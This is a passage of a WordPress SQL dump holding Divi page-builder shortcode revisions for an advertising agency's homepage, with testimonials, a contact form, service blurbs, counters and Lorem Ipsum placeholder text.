portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 19:59:19','2020-08-07 19:59:19','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(578,1,'2020-08-07 20:00:47','2020-08-07 20:00:47','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" 